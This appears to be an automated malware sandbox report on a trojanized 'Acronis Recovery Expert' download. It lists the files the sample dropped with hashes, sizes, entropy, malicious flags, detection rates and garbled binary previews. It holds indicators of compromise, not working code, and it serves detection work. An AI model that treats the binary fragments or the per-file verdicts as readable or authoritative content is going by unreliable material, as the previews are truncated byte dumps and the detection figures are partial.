SHA1:1792171192D7E2DEB58E434F89A7FD773F85B667
SHA-256:82C245F6147B41D24524CE35DB3B6FCB58C2091B5C77BBF26525EA0100C636E2
SHA-512:E5F50DBF3A0D92A22320D3D3FA72515884FE59FA224FCA67C9D77059A038913B90DACEF12E7AF1837A78302920B97D3B565D111EDCBBD3F3F83766EEB4AD4947
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1436832
Entropy (8bit):6.483651927764537
Encrypted:false
SSDEEP:24576:KLtbu58TIu2rlMBDr0PZYRhVj95f1L7Zr5/z/5ccUYXIBXzkTVsHgWolUZbGgqfR:KLtHAcX0PZuhVDh7ZN7/6YXIBjkBsHgl
MD5:9AACD65DC0DD646E37210F551C0BBCF8
SHA1:1936747704AAB1641C816D87C89DAC051894CC25
SHA-256:657560246FEF45B29D315A530959D311A35461977B750C4AEEABC2EDC18616C4
SHA-512:DFA4F89BDE35BA51F1871EAF57FDB3386883C5632848B115AC2C1F7F7C6DED0BF30640C2BDE260451FCB69F79D9A7EFA4B005D6FD5D7FD2EAB99964332BF3480
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):339824
Entropy (8bit):6.67232955431635
Encrypted:false
SSDEEP:6144:zLU98dTLLPTtdO37tzHzjRzPSzHKBJupBzC8vAocIGhL99WP+gDjX5oOyOta3H/C:P9PLrtShzHzjRMcQpsSCTO2H/Kj
MD5:54EE6A204238313DC6ACA21C7E036C17
SHA1:531FD1C18E2E4984C72334EB56AF78A1048DA6C7
SHA-256:0ABF68B8409046A1555D48AC506FD26FDA4B29D8D61E07BC412A4E21DE2782FD
SHA-512:19A2E371712AAB54B75059D39A9AEA6E7DE2EB69B3FFC0332E60DF617EBB9DE61571B2CA722CDDB75C9CBC79F8200D03F73539F21F69366EAE3C7641731C7820
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..8..U8..U8..U...U9..U...U=..U...U,..U8..Uo..U.c.U=..U.a.U9..U.c.U6..U.c.U?..U.c.U9..U.c.UY..U.c.U9..U.c.U9..URich8..U................PE..L....LF...........!.........x......(.............pZ.........................@...........................................}...[..........,...............p%......\7..X...8...............................@............................................text.............................. ..`.data...l7..........................@....rsrc...,...........................@..@.reloc..\7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):515272
                                                                                                                                                                                                                                        Entropy (8bit):7.005589549281488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:K5NQiy4hbNqpbAuoa0MFsfFFWeRT7DwRgVpNtg+Oy+NJfOMBfcQ85VKo2qoT:K5NzhGstFWcW+g9OyGKoboT
                                                                                                                                                                                                                                        MD5:5C48918247C4F18AFF250A02430174C6
                                                                                                                                                                                                                                        SHA1:FDB3B1ECFE3BA516410143E32E20EC99C5D96F67
                                                                                                                                                                                                                                        SHA-256:3B3BE931FF4C9D587FC4D6FF91FF6EA978F21D032A22F1885AA357907DA60D75
                                                                                                                                                                                                                                        SHA-512:632502A628313A41FE765831C6AAE9CF23D8E73C4A1D756689FE6B2F5A694DC361FCC3721C3C903AC89E00E6BC1708AE0A3F95785D58C40B92FE2A434E00D550
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:...i...i...i..Oi...i...i...i.@Bi...i.@vi8..i.@wi...i.@Gi...i.@Fi...i.@Ai...iRich...i........................PE..d.....OS.........." .................).......................................P......S/....@.................................................D...(.... ...........!...........0.......2...............................................0..@............................text...f........................... ..`.rdata..^....0......................@..@.data....b.......>..................@....pdata...!......."..................@..@text.................P..............@.. data.....A.......B...h..............@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):810320
                                                                                                                                                                                                                                        Entropy (8bit):6.207204782459616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:2qjIhzdNvajtjz38HkZIbKnxPxlJsk7aMClZE:2qjIhzdNvkjGKP1I+
                                                                                                                                                                                                                                        MD5:EF66829B99BBFC465B05DC7411B0DCFA
                                                                                                                                                                                                                                        SHA1:C6F6275F92053B4B9FA8F2738ED3E84F45261503
                                                                                                                                                                                                                                        SHA-256:257E6489F5B733F2822F0689295A9F47873BE3CEC5F4A135CD847A2F2C82A575
                                                                                                                                                                                                                                        SHA-512:6839B7372E37E67C270A4225F91DF21F856158A292849DA2101C2978CE37CD08B75923AB30CA39D7360CE896FC6A2A2D646DD88EB2993CEF612C43A475FDB2EA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Idc.(.0.(.0.(.0@.t0.(.0.'U0.(.0.(.0.).0.'W0.(.0..w0.(.0..g0v(.0..p0.(.0..d0.(.0@.O0.(.0..r0.(.0Rich.(.0................PE..L.....D...........!.....~........................P'.................................L......................................e..,.......@............B..P........p..................................._..@...............`............................text....|.......~.................. ..`.data...8L.......*..................@....rsrc...@...........................@..@.reloc.............................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5729136
                                                                                                                                                                                                                                        Entropy (8bit):6.3266178693130755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:ERUl697ngPTrho9J8kgdjbHNZ5PP/Re5m3mxVN6KEp0v7J7k66ZRkQTXw+sljVop:uAXqnhON8m3mzNHTdw6YSX+sleu5y
                                                                                                                                                                                                                                        MD5:537915708FE4E81E18E99D5104B353ED
                                                                                                                                                                                                                                        SHA1:128DDB7096E5B748C72DC13F55B593D8D20AA3FB
                                                                                                                                                                                                                                        SHA-256:6DC7275F2143D1DE0CA66C487B0F2EBFF3D4C6A79684F03B9619BF23143ECF74
                                                                                                                                                                                                                                        SHA-512:9CEAAF7AA5889BE9F5606646403133782D004B9D78EF83D7007DFCE67C0F4F688D7931AEBC74F1FC30AAC2F1DD6281BDADFB52BC3EA46ACA33B334ADB4067AE2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v..v..v.....b..Q..~.....w..Q..|..Q...A.....G..v.....Q......Q..w..v..w..Q..w..Richv..................PE..L...%.LF..................K..r......A*........O...@..........................`W......+X.......... ............................J.D.....T..............FW.p%............K.8...............................@.....................J......................text...:.K.......K................. ..`.data...P.....K.......K.............@....rsrc.........T......hT.............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6751136
                                                                                                                                                                                                                                        Entropy (8bit):7.800052983990694
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:35pmmvotTUS2vDBtB18Kw6q7m+8VkF0eP6f3Ixzt4BvpD/ryFo3OBF5kcUlOqZfB:pAKotTwVtZwEA0YE6+NyFo8UD2gfx
                                                                                                                                                                                                                                        MD5:72614F654C4B82D1B1EADC7F0A82BDFA
                                                                                                                                                                                                                                        SHA1:162528C6D749BD66F40C0826CBD64EBDA8F94E10
                                                                                                                                                                                                                                        SHA-256:C5583FF295CAB60C913D6DA7D8461B6697D7294F6CA308F49E65222E443B4890
                                                                                                                                                                                                                                        SHA-512:A5EE39E02FF427102AF8A3632D45B73359AB4ACA0DB53DA52166A293EE73BA155D5EDE3E404AC3C4E43B90A1179A255F96FC1F270A7898E94320CACD7F8C1F0E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 48%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$...w...w...wy..w...wy..w...w...w...w.U.w...w-W.w...w.U.w...wy..w...wy..w...w.U.w...w.U.w...w.U.wE..w.U.w...w.U.w...wRich...w........PE..L.....LF...........!.................eb............Y.........................@g.....A.g..............................,......$.].T.....f...............f.......f....`...8...........................@rf.@............@C..............................text.............................. ..`.data....+......."..................@....data0...b4......d4................. ..`.data1.......@C.......C.............@....data2..P&#..PC..(#...C............. ..`.rsrc.........f......8f.............@..@.reloc.......f......>f.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):626688
                                                                                                                                                                                                                                        Entropy (8bit):6.840096566307411
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:mxzh9hH5RVKTp0G+vFhr46CI600yZmGyYG:mph9hHzVKOpt6MmGyY
                                                                                                                                                                                                                                        MD5:43143ABB001D4211FAB627C136124A44
                                                                                                                                                                                                                                        SHA1:EDB99760AE04BFE68AAACF34EB0287A3C10EC885
                                                                                                                                                                                                                                        SHA-256:CB8928FF2FAF2921B1EDDC267DCE1BB64E6FEE4D15B68CD32588E0F3BE116B03
                                                                                                                                                                                                                                        SHA-512:CED96CA5D1E2573DBF21875CF98A8FCB86B5BCDCA4C041680A9CB87374378E04835F02AB569D5243608C68FEB2E9B30FFE39FEB598F5081261A57D1CE97556A6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.........@................!......;.............d.......................Rich...................PE..L...I^j[...........!.....0...p......+#.......@.....x......................................@..........................q...~..Pc..<....`.......................p..P3...B...............................F..@............@...............................text....'.......0.................. ..`.rdata......@.......@..............@..@.data...Li.......P..................@....rsrc........`.......@..............@..@.reloc...7...p...@...P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 222243615307464704.000000, unit celsius, color scheme 0, userbration: offset 0.000000, slope 2097169.750000
Category: dropped
Size (bytes): 6015798
Entropy (8bit): 7.9812030497985536
Encrypted: false
SSDEEP: 98304:iReAn0Q7G9g0ORXr8d3UeNsnvkfNv2MDbDegTUdgW/jcThCZ5cJhEpQVAsVjdP:bY0QYghRXr8d3r6Wl2cbydcCZCwMP
MD5: 110F3FC1762468FE42EB1040E2445B24
SHA1: B9D0F3342338C9BAA26BC502CCA3AD4218DC5AF6
SHA-256: ECB71466BA2CC1B223FD83B4C4E47E975EAEE6E56A68028B70EE6F6EA9B77EA3
SHA-512: B0825A6FB99D93D858DA0DEC2D9CEA6667426B89E3D84B96C2F725FFFDD7528FA30EFF31ECE5AF979398B53A617694AE1DEA6F8005F00AFA1A037599A74E06AA
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1046528
Entropy (8bit): 6.203517479529882
Encrypted: false
SSDEEP: 24576:W35vXxybQcMYjPvBH2VsJzwRBPrxKIQg6F:WJ/AbFjr+PrxKIp
MD5: 5262795822926C515042CAAB4D8604D8
SHA1: FB4137F82C67B05C3D3EE9BCF0F0778001B41A60
SHA-256: 8E2C94CE0A149047B45652C8D22428E9FF3834CB7328E28EDD33DEB5D9D06ECA
SHA-512: EB21CEA2346D56F78912742E177DA651F98B6FF3217A3B40BF0617ED7FF1A7F905FF07C8CDCE03F0C9B233818F2FD002AA59DA288065FA1543F46FCCE868BD13
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 71499
Entropy (8bit): 4.4398294453833795
Encrypted: false
SSDEEP: 1536:Ick5oY4q7NoIO0WXLaawaVeXzEbpbBWFNcd00ZK7iP+j9:IbR4q7NoIEFVeEFkcd0002P+j9
MD5: E96CD0CAD852FE12F4476403099FABB2
SHA1: DA06AA5EAD8232C934F4A63B1E4097B3ACDC0B10
SHA-256: 3917C00F233C165A4E2C59712D1E15C24A5702C9B65E22D583F6EA04242F67E4
SHA-512: 4D50D18E9D63D922FE0F5D7C0A9654A1E1387F162A49B7DB3D9FECBA8185685A4E159D78AB69D3015D983AC1B19CDD5AE026616D0802620BE3D148E8B1B4956A
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5: 106D01F562D751E62B702803895E93E0
SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 19484
Entropy (8bit): 5.6095636822181225
Encrypted: false
SSDEEP: 384:IvuTdkXo4rmYEWhzWpBMiXJC78xz684O1rn2XrCQwiaVji6F7OP9hDGuhcO:t5q2cqpyiXUcu8Jr6rfaNil9wO
MD5: 55D5EC59A903D85C501CBDC9AA814580
SHA1: 0BDDDCDCE0BF8F17EC31C4089F0B8CFC4B245618
SHA-256: 50491D50A591DFE3A7F9144B673B78C7AD18818438B5970951D8F3B15E57FA6D
SHA-512: 1FCF7FB8B138A7426A332F984EFF5411C08CCE9773DA0CADCE69249F2536EC3BD4C29A8743449C73EC526BCB18433D1CB98429C723C3685750838603C8EC3E5E
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\650429\Palestine.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 18610385
Entropy (8bit): 7.988718937379966
Encrypted: false
SSDEEP: 393216:/AsuyDZ9JgjA3J3f0jec34HR0h72YZY4GO79KRaCwGt3xdBYDum1k:YK95ZsL4H6hdnGRgGbBYDm
MD5: 0EFDBBF3F5074D596D3E61446B623942
SHA1: EC206D4E793A203DF221F456FD9E626EB3E8D9EC
SHA-256: 85082DA27713BE48EF8CE523370111F97F0A54E2BE4CECE2463CC5671513B4C4
SHA-512: C3312A6C26455EBD86683058D4E7C49D6D92EBB42CC617A559317DE11FA54CAB7B45C8A7CC114F73DC295E68A977382F846BD2F662AF89AC918AF3A59566E5C9
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 18%
Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 474688
Entropy (8bit): 7.999593154939864
Encrypted: true
SSDEEP: 12288:fOvJBeffP+z4BVPm23TOAFtKINL2lRll7a:Gv7enWzK3Txu7Va
MD5: 9B83BF7CADD60D542183F587AE07E092
SHA1: 8907A315D781DE77093057CE4A43A190D00B5284
SHA-256: F0F666D158614CC2C05EC0F6C428FF2A4C483F05B2A03F7F0A9A6AC600B9B22D
SHA-512: 9F6AB45BDA0CA346366EA6B6BD125F836D30808D4BE4D61C37954ED84454AED2DFDE5F5F9FE5B8AC6C91E26AB254373EC71E77238DE09ADF3A3AFAC7C6FB7C11
Malicious: false
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 947288
Entropy (8bit): 6.630612696399572
Encrypted: false
SSDEEP: 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5: 62D09F076E6E0240548C2F837536A46A
SHA1: 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256: 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512: 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18817091
                                                                                                                                                                                                                                        Entropy (8bit):7.998043677768579
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:393216:vOHdml+PI32WVBE+T/z56UZjx+/vLh2MYmE+eBeChXOE3gb/D9xqx:viml+g3lVBEIr5lWQM5Ezb3Kz2
                                                                                                                                                                                                                                        MD5:B3923A3753F6CFB886CB3C0EB9A482EB
                                                                                                                                                                                                                                        SHA1:4E32830B43642D0E16A0DB0FDC22C22054A5A798
                                                                                                                                                                                                                                        SHA-256:F8E2E5B144310C92D009450BD3EE03EBF61AF48C51829A0CAC102A078517E7AE
                                                                                                                                                                                                                                        SHA-512:CD03BCC79DC05EC29BF4941172CE1A9DB0988A1618F09959BEA01A86609401C146B03BB668109078B907B50F5A5957699552A186FBC081C1EC04278FE95D4C3D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK.........Y........6.[... .pjnbshUT.....Wg..Wg..Wgux.............L[.|SU...2#:(....A....Z...4[.4I.7m.6i..i..,....U...J.Fd.......3....%.HU(e.....&.9..g...6y...9.s.}..H!...2./$...!%...B..>.?6B...D....u....^B....Z..I..3.....|...x..r.v]Q.....|G*..KWE......e\..j...4PDH..j...<.....q..FC..yA..RR.K8t. .7..B.H.....1V...2..@....b.|,$vq)..._%..S..J...!.JDr.[..V...Q...O\!P....s$..$..TH.._BL..Kq>.*H...BE...Z..e..q..C.(RD..6.U..~...D&...]1...D...<DK?....F.#.r?./.T..V..V0.t.jT...h.*..V9...CZ5DD.0..G.vx.Y..U..zN..2.=.x..-."6..L....K..aB..%\H..!.{......C.S.M1}x%1.....G1.S....VZ-1.....m.@.t.Ba.<..cT15..`..c......V...j.f..?|k9kQ.Qo".~....:.J.#".l.T2z1..|4N%..\.V.....>.=F.">..9P.,..r.j....{a.A.. H.....2.T1C.N..\.....U.e..E..u.............NRXJ.b..O.V...%.h...G..Ox.'.8.#%.V?.!..h.g.W+.j/.@A..F....MBR.%...l..br5]C...V.HX.9...........YmE.!..F..`D..@......b.....D....E4c...o..`Y...............D.."f..Hy.(F.4`".+.O........J.`.z...9. .....bF.U..x...@.......<.A.t....E...0.....".?..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):119808
                                                                                                                                                                                                                                        Entropy (8bit):6.585854620954676
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:WBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfU:WjphfhnvO5bLezWWt/Dd314V14ZgP0f
                                                                                                                                                                                                                                        MD5:13D24AA4E93EF82DA1567D83B817C03E
                                                                                                                                                                                                                                        SHA1:24B214EF35060CCEA94AE5193B8360E7611BF3DD
                                                                                                                                                                                                                                        SHA-256:9824CABFCE1C95130BEA6B69F6E03999E97CF2C45E6922C2E3A3104FCC373205
                                                                                                                                                                                                                                        SHA-512:FAB74277A3FF0DE9E87D54B994BD47EF7DFBBC62C17CC7464E4D1DF419D16E68CC754BCA7934ADD146B89E0B8C2A341F66740E5BD833D448F1FDE8F7D4818BF4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.N..................u....u._^3.[..]...U.......S.].V.L$.W.C.....0......F.........u..u....]....&..F...........C..H..0......C..H..#....D$..C..H.......D$..C..H.......{...D$.r..C..H.........L$.j.W.t$.V.%.....}....t.j._.C..0........N........t$...........j.W.t$ ...t$(.C%.............C..0......N........L$........n..._^3.[..]...U..E.V.@..0...~....F.... .....u..u....F....&..F.....3.^]...U...TSV.5,.I.3.Wh....S....h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...E.E.P.E.........I...uN.u....S......3.B.V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...0.I.SP...H.....q.....E..t.;D..t.C...~..u....~............F......._^3.[....U... SVW.E...P....I...4.I.P.E.P.......@....E..}.)E..E.)E.....u`.M...t..3..j.CSV.Rz...M..E.3..M.WSPV.}.]..(.......M..]....E.S.E..E.SPV.}.]..........M..:....~.G....?.....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...B......u..u...}.......F......!.G....
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105472
                                                                                                                                                                                                                                        Entropy (8bit):6.684445075295248
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Ixu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5J:G/sZydTmRxlHS3NxrHSBRtNPnj0nEz
                                                                                                                                                                                                                                        MD5:CA217340293A4943C905BA624E7A6C72
                                                                                                                                                                                                                                        SHA1:D8334AC7F442203C9CA73BAEAC9F7A7435BB173E
                                                                                                                                                                                                                                        SHA-256:5190F6FEDA768EA309ABFB4B2BD8F46A9A4CC82274E429849828514C70D9D813
                                                                                                                                                                                                                                        SHA-512:951583B82531B90188AAD52AA0C7A305AD3BE7697A3EE1B1F6932FEBA39FD9A4D56EB8C49192A46463D752BBE17ACAE926D1913820CB14A8C0BD2EEE7A59AE01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<G.E.@.}..E.;E.|..6...;M...0...;~|............E.....%......=....u&..G.......%....................E...............s..FD...........E.<G.E.@.}..E.;E.|.....;M.......;~|sp......E.....%......=....u#..G.......%..........E....................Y....FD......L....E.<G.E.@.}..E.;E.|..2............%...;............Fh.............."............:"...$.7.E.;M...Z....N|;........V...t..F.j.PQ..........t-.....V....+.;.w.f..f;F4u..........f.G.f;F6tw.......t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............!...E...@.}..E.;E...\....%.......t.;.....v..Fh..............!...U.....)M.N|..+...9E.v7..........}...d...;.......X....Fh.............D....F!...E.<G.}..1...;M...(....N|;.sy......u.....}.;.......f.?.tF.J...t?.~l..........t0...t+.E....f;E.t..E.( ..f;E.t..E.) ..f;E...........}..E.@.E.;E.|..................;............Fh.............{....} ..;M...m...;~|s....=....w2..X...=....w...K........B..... uG.8...=....u;.,...=_ ..w$......=. ..r"=. ........=/ ..u......=.0...........A.}.;M...y........;M.......;
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86016
                                                                                                                                                                                                                                        Entropy (8bit):7.997710944828758
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:46RFKjL890OVVfezm6ouihqnb5DklhWEZbJdZuQduDIl+:rPKjYLOy6R7ShpbJ3rl+
                                                                                                                                                                                                                                        MD5:257EBB27CC75D77A9DEB487F9496059D
                                                                                                                                                                                                                                        SHA1:374A7ABE4C482535F63F7FC51D96ADD1D6C6E5CD
                                                                                                                                                                                                                                        SHA-256:ACAC2C119EA0FF3B18BBD1B0F51EC69ADDB4FA1F211F3CA1802EBB431054D4B1
                                                                                                                                                                                                                                        SHA-512:EFB47585757E246B2F4F45C0014B0E054AE7509CF0BDE92786B79708AC85581D1364A1074ECCDCBFBD9F68EECDC4B8D81396BC3782BC1E020BF1FE5676FF9440
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:7..fY..y..eS.K...6...o.7d.}...C... .......y^$.a........ ..M..3....S..+i.raj. &...@.Y..8...c.A.+...h.+..i....}@-.{.2....m......~.L...P`x......A9......'..&-`..kfg...a.<"}...XL.b.i..g....,..a\=.|x.o=G$..x.2......v)..N../g..l.N.@...}..R.T....A...aZ..M......z......!...._A...h.xk;Sfk.c.~P..2..7..l.@...'........VgC&0~<*v.+r...m....!.......*..T.\...5e.[......w.H?@.<.H*.<...22..Ce.X.{.bq......>[.....0.n}4....G......Ph..j..,^...&V.....w.V./.\.....k....xW.......]..\..3.^0.9.=...Uj....`b.a..5..........^...................QW....#.V..Gq..H..X.....e.Y...$..q..28.....[..._..22a..z....nL....N{.c..........h.. .F...].....>._xp~..R..G.h.>GQI.0...$W.;.X~U.j...Y....t....e0@.W.!f.5...GVp.{Q....i.$...l...2p..[a.o&~.o2*JN..+p.d".5..Vy...=a..."0K)..?.0.p..&.m^...l]...*..>....J..?G........R...E..C.9..2r.d..v.$...M..k./.-0..8.%\.*/. .|(....?..><..'|.......hR..fc.{J2H..j...n..;H..c.{va<i...U.,F&!2G$.w...t.....i..,.Z.v$.b.......s.:.I.^E..5.v..6....M...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79872
                                                                                                                                                                                                                                        Entropy (8bit):7.997726432731598
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:p5GXkJnHaV+UkE5DoAboy97UIOUdN2srBWObwWyxU+lj3XEZGLSGZn:yX5wYuAbL97UINHr5N+lgojZn
                                                                                                                                                                                                                                        MD5:1B651C62E9976918E54FF11622792B9C
                                                                                                                                                                                                                                        SHA1:FF757994E070F9ECCD138D02273834AAB9637684
                                                                                                                                                                                                                                        SHA-256:5DAAD9BFBDFB2D5AA081FCD8F7764EBAD17FDD4E9F690FCC2A5F12A07CCDA58B
                                                                                                                                                                                                                                        SHA-512:E18A73B16BF232FA2589CEEACAB11AFBAF2BFF90665A31E700687F5C227312BB0AEB8068F336F6C969467DEB2D6C60E812E4BCC2666CAB250BB781233FEF7851
                                                                                                                                                                                                                                        Malicious:false
